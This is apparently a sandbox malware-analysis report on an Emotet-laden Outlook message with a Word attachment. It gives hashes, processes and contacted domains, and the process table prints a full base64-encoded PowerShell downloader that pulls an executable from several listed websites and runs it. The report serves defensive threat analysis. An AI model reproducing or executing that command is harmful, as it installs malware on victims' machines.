File name: | Dokumenty za odprawy.msg |
Full analysis: | https://app.any.run/tasks/423951d6-5932-4ee9-9cd2-238a164ec28d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 18:01:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 3AB5B5B22079C4B8485DF815BE2AA85F |
SHA1: | 478A30FE6E9D8AD707C15CE10E37D99931AE1356 |
SHA256: | B87BDBDA6CD6F8ED36D6EF7BE4204F1BCA1930C75612DAA374A8273EE0BAA4F8 |
SSDEEP: | 6144:VVGA85XuWpTEW1kKMJQqKahTUPLkI47NSU4jJntATfDKW:VVGA85XuWpTEW1kKMJQqKah6X47NSU44 |
.msg | | | Outlook Message (41.3) |
---|---|---|
.oft | | | Outlook Form Template (24.1) |
.doc | | | Microsoft Word document (18.6) |
.doc | | | Microsoft Word document (old ver.) (11) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2220 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Dokumenty za odprawy.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
2644 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3776 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\DBUXZ0FZ\Projekt_74050852_20_09_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3028 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2392 | powershell -encod JABmAHEAdwA2AG0AdwBCAD0AJwBhAFgAbgBtAEwASwBfADAAJwA7ACQASgB3AHQAcwBYAHIASAAgAD0AIAAnADUANAA4ACcAOwAkAHUAdwBEAGwAOABpAD0AJwBsAGsAMwBqAGQAaQBpAHQAJwA7ACQAdABjADAAWgB3AHoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEoAdwB0AHMAWAByAEgAKwAnAC4AZQB4AGUAJwA7ACQATwBwADkAdwBfAFMAPQAnAGkAbABqAHQAWQBKADMAagAnADsAJABzAGMAVQBpAGgAXwA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAGwASQBlAG4AVAA7ACQATABUAGoAMgBaAFMAdQB3AD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGgAZQBmAGUAbABhAGQAbABlAHYAaQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG4AMgBkADMANQA2ADAALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGEAdABjAGgAZQBjAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvADkAMwB2ADIAMQAvAEAAaAB0AHQAcABzADoALwAvAGEAcABsAHMAbwBsAHUAdABpAG8AbgBzAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB0AHcAdgBzAC8AMwAwADAANgA2ADYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AHYAagBvAHYAZQBtAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA4AG4AcAA0AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBmAGEAcgBhAHcAZQBlAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUAZQBtAHcANgAyADIALwAnAC4AIgBTAHAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAagBNADAARAB6AE8ANABPAD0AJwBJAEkAbwBjAFAAMwBSAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHoAagBuAE4AMQBJAFkAIABpAG4AIAAkAEwAVABqADIAWgBTAHUAdwApAHsAdAByAHkAewAkAHMAYwBVAGkAaABfAC4AIgBkAE8AVwBOAGAATABgAG8AQQBEAGAARgBJAEwAZQAiACgAJAB6AGoAbgBOADEASQBZACwAIAAkAHQAYwAwAFoAdwB6ACkAOwAkAG8AdwBKAE8AOQBhAD0AJwBKAHQAcAA5AEIAcwBGAGgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJAB0AGMAMABaAHcAegApAC4AIgBMAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADIAMgA3ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAHIAdAAiACgAJAB0AGMAMABaAHcAegApADsAJABsADcAdgBwAGsAaQBjADkAPQAnAGIANABSAFAAVwBEADMAJwA7AGIAcgBlAGEAawA7ACQARgBXAEEANQBEADYATQBOAD0AJwBTAHQAdABFAHQAaABMAEIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaQBqAGQASABoAG8AMgA9ACcAaQBvAE8AaQBZAEcAagB0ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRD31.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\DBUXZ0FZ\Projekt_74050852_20_09_2019 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DFB7BF514CAB4824DA.TMP | — | |
MD5:— | SHA256:— | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DFA6249D1AB1E45C1F.TMP | — | |
MD5:— | SHA256:— | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\OICE_581F0D58-313F-4997-B75D-AA62FCFFC407.0\F3950074.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:C8D9F427C18430C5F6CB6F5A99809BAA | SHA256:C3AA75DCFB1D7AB591977AAC83B3DCA652287E61FCD4547C60D8F48E1D710B83 | |||
2644 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_581F0D58-313F-4997-B75D-AA62FCFFC407.0\E0B329C6.wmf | wmf | |
MD5:6822F687B3A727C5BD97A3DE8B6BB3A1 | SHA256:7550E2F49E6BA0598A80C853D2C2A0C9B37E28BF5ED74BB72C4620FF0933DA95 | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\DBUXZ0FZ\Projekt_74050852_20_09_2019 (2).doc | document | |
MD5:314E8590C878B2C1D0091E270F803E03 | SHA256:7BB6CBB1784DDFCDA61730302CAB547287D49EBFDCBC0EEE5BE958F00AF4241F | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_F150BD2ABE1532488F12AA0A281C9FF1.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 | |||
2220 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\DBUXZ0FZ\Projekt_74050852_20_09_2019.doc | document | |
MD5:314E8590C878B2C1D0091E270F803E03 | SHA256:7BB6CBB1784DDFCDA61730302CAB547287D49EBFDCBC0EEE5BE958F00AF4241F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2220 | OUTLOOK.EXE | GET | 404 | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | xml | 345 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2392 | powershell.exe | 192.95.29.89:443 | tvjovem.net | OVH SAS | CA | unknown |
2392 | powershell.exe | 192.124.249.53:443 | aplsolutionsonline.com | Sucuri | US | malicious |
2392 | powershell.exe | 88.218.117.52:443 | www.chefeladlevi.com | — | ES | unknown |
2220 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2392 | powershell.exe | 45.197.65.103:443 | www.atchec.com | MacroLAN | ZA | unknown |
2392 | powershell.exe | 192.34.63.180:443 | www.faraweel.com | Digital Ocean, Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
www.chefeladlevi.com |
| unknown |
www.atchec.com |
| unknown |
aplsolutionsonline.com |
| malicious |
tvjovem.net |
| unknown |
www.faraweel.com |
| unknown |